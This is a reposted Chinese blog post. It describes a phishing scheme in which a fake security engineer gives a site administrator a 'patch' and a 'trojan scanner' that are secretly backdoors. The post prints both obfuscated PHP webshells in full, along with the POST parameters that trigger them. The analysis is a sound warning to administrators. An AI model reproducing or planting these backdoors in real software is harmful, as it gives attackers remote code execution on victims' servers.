Home  >  Article  >  Backend Development  >  如何利用钓鱼黑吃黑

如何利用钓鱼黑吃黑

WBOY
WBOYOriginal
2016-06-20 12:30:141910browse

0x00 前言

15年10月写的文章,今天无意翻到了,就刚好贴在博客吧。

博客也很久没更新了。

0x01 钓鱼模式

0x02 神奇补丁程序

这是所谓的安全工程师发给网管的安全代码。

<?php$MMIC= $_GET['tid']?$_GET['tid']:$_GET['fid'];if($MMIC >1000000){  die('404');}if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"])){  $__PHP_debug   = array (    'ZendName' => '70,61,73,73',     'ZendPort' => '63,68,65,63,6b',    'ZendSalt' => '202cb962ac59075b964b07152d234b70'  //792e19812fafd57c7ac150af768d95ce  );   $__PHP_replace = array (    pack('H*', join('', explode(',', $__PHP_debug['ZendName']))),    pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))),    $__PHP_debug['ZendSalt']  );  $__PHP_request = &$_POST;  $__PHP_token   = md5($__PHP_request[$__PHP_replace[0]]);   if ($__PHP_token == $__PHP_replace[2])  {    $__PHP_token = preg_replace (      chr(47).$__PHP_token.chr(47).chr(101),      $__PHP_request[$__PHP_replace[1]],      $__PHP_token    );     unset (      $__PHP_debug,      $__PHP_replace,      $__PHP_request,      $__PHP_token    );     if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!');   }}

代码我已经将792e19812fafd57c7ac150af768d95ce这个md5换成了123的md5 202cb962ac59075b964b07152d234b70

这个代码一看,如果之前没接触过类似的代码,应该会有很多人会认为:这个代码搞啥玩儿,php内核?

乍眼看,应该没什么后门

百度搜索一下792e19812fafd57c7ac150af768d95ce,看快照,可以发现

最后解密出来其实是利用preg_replace的/e来执行的一句话webshell。

利用方式:pass=123&check=phpinfo();

钓鱼的代码还有以下几种:

有的黑客将后门代码放在 扫描木马后门 的程序里。特别的猥琐

<?php    # return 32md5 back 6    function getMd5($md5 = null) {        $key = substr(md5($md5),26);        return $key;         }         $array = array(            chr(112).chr(97).chr(115).chr(115), //pass            chr(99).chr(104).chr(101).chr(99).chr(107), // check            chr(99).chr(52).chr(53).chr(49).chr(99).chr(99) // c451cc        );        if ( isset($_POST) ){            $request = &$_POST;        }                 elseif ( isset($_REQUEST) )  $request = &$_REQUEST;                if ( isset($request[$array[0]]) && isset($request[$array[1]]) ) {             if ( getMd5($request[$array[0]]) == $array[2] ) {  //md5(pass) == c451cc                $token = preg_replace (                chr(47) . $array[2] . chr(47) . chr(101),  //  /c451cc/e                $request[$array[1]],                 $array[2]            );        }    }?>

0x03 具体钓鱼

下面是一个黑客钓鱼的真实场景。先看下黑阔的背景身份。

  1. 伪装安全工程师

个人主页: http://loudong.360.cn/vul/profile/uid/2822960/

伪装成360补天的一名白帽子,并且把自己QQ地址写成360公司的地址

但是黑客却以为补天的白帽子就是360的员工

不过站长也确实信了他360的身份。因为改的备注是 360安全小组

  1. 强调补丁的强大

用了补丁代码,*地址立马404。还用chattr +i 设置文件为read only

0x04 总结

安全,从我做起

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn